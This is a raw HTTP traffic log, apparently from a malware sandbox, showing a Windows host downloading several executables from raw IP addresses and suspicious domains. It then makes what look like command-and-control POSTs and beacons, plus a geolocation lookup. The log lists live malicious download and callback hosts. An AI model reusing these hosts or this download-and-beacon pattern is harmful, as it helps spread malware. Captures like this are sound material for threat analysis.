HEAD /g.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.66.230.164 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK etag: "3f200-64b10081-60e81;;;" last-modified: Fri, 14 Jul 2023 08:00:01 GMT content-type: application/x-executable content-length: 258560 accept-ranges: bytes date: Fri, 14 Jul 2023 08:11:24 GMT server: LiteSpeed connection: Keep-Alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Wed, 08 Feb 2023 16:52:56 GMT ETag: "37d-5f433188daa00" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 14 Jul 2023 09:11:24 GMT Date: Fri, 14 Jul 2023 08:11:24 GMT Connection: keep-alive

GET /g.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.66.230.164 Cache-Control: no-cache

HTTP/1.1 200 OK etag: "3f200-64b10081-60e81;;;" last-modified: Fri, 14 Jul 2023 08:00:01 GMT content-type: application/x-executable content-length: 258560 accept-ranges: bytes date: Fri, 14 Jul 2023 08:11:25 GMT server: LiteSpeed connection: Keep-Alive

GET /info/photo540.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.124.40 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Fri, 14 Jul 2023 16:11:05 GMT Accept-Ranges: bytes ETag: "92edb5ca6db6d91:0" Server: Microsoft-IIS/10.0 Date: Fri, 14 Jul 2023 16:11:23 GMT Content-Length: 1624576

HEAD /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 14 Jul 2023 08:11:25 GMT Content-Type: application/octet-stream Content-Length: 168448 Last-Modified: Fri, 14 Jul 2023 08:00:02 GMT Connection: keep-alive ETag: "64b10082-29200" Accept-Ranges: bytes

HEAD /m/okka25.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: zzz.fhauiehgha.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 14 Jul 2023 08:11:25 GMT Content-Type: application/octet-stream Content-Length: 606208 Last-Modified: Thu, 13 Jul 2023 06:30:57 GMT Connection: keep-alive ETag: "64af9a21-94000" Accept-Ranges: bytes

GET /m/okka25.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: zzz.fhauiehgha.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 14 Jul 2023 08:11:25 GMT Content-Type: application/octet-stream Content-Length: 606208 Last-Modified: Thu, 13 Jul 2023 06:30:57 GMT Connection: keep-alive ETag: "64af9a21-94000" Accept-Ranges: bytes

GET /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 14 Jul 2023 08:11:26 GMT Content-Type: application/octet-stream Content-Length: 168448 Last-Modified: Fri, 14 Jul 2023 08:00:02 GMT Connection: keep-alive ETag: "64b10082-29200" Accept-Ranges: bytes

GET /sts/imagc.jpg HTTP/1.1 User-Agent: HTTPREAD Host: us.imgjeoigaa.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 14 Jul 2023 08:12:08 GMT Content-Type: image/jpeg Content-Length: 1506508 Last-Modified: Wed, 28 Jun 2023 02:36:24 GMT Connection: keep-alive ETag: "649b9ca8-16fccc" Accept-Ranges: bytes

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 517 Host: 85.208.136.10

HTTP/1.1 200 OK Date: Fri, 14 Jul 2023 08:12:17 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /check/safe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43 Host: aa.imgjeoogbb.com

HTTP/1.1 200 OK Server: nginx Date: Fri, 14 Jul 2023 08:12:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/7.4.30

POST /check/?sid=562266&key=6c3f7f1320704c1ed0fe959fab6bbb7f HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43 Content-Length: 160 Host: aa.imgjeoogbb.com

HTTP/1.1 200 OK Server: nginx Date: Fri, 14 Jul 2023 08:12:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/7.4.30

GET /test/setStats.php?id=_start HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: content.elite-hacks.ru

HTTP/1.1 200 OK Date: Fri, 14 Jul 2023 08:12:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kmwqd0mp2wB2cNgNmV0wiSiYubHnkwXuVuSjK7N42WrPSnTHbAklail6aAeRqzHvuzRQP5SC4dZRTP%2FKXCrP1swOcKEJ6fI4QvjbjVUEUwcrvyupjHjZtxFmtWpQ%2BekNOftAh%2Bv2QirG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e684cc45b6e1a20-KIX alt-svc: h3=":443"; ma=86400

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Fri, 14 Jul 2023 08:12:18 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 85.208.136.10

HTTP/1.1 200 OK Date: Fri, 14 Jul 2023 08:12:19 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com

HTTP/1.1 301 Moved Permanently Date: Fri, 14 Jul 2023 08:12:21 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 14 Jul 2023 09:12:21 GMT Location: https://www.maxmind.com/geoip/v2.1/city/me Server: cloudflare CF-RAY: 7e684cdd5feea7c3-ICN

GET /test/setStats.php?id=_stop HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: content.elite-hacks.ru

HTTP/1.1 200 OK Date: Fri, 14 Jul 2023 08:12:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xAvCnzi5T7Sf5HQT19t8ft9IPxcirbKt5Xj6NVRnDMXVDvCrGjS3mMbTuhHHTfbuUS4TskbbewzSAOwRma5JNW6NDKM61SREk8l0d%2BtNQOu8nExYMst%2BsZpxA0OW1X0AP2vAn9z8ny9I"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e684cec9a6b1a20-KIX alt-svc: h3=":443"; ma=86400

POST /home/love/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.3 Content-Length: 90 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 14 Jul 2023 08:13:02 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 184 Content-Type: text/html; charset=UTF-8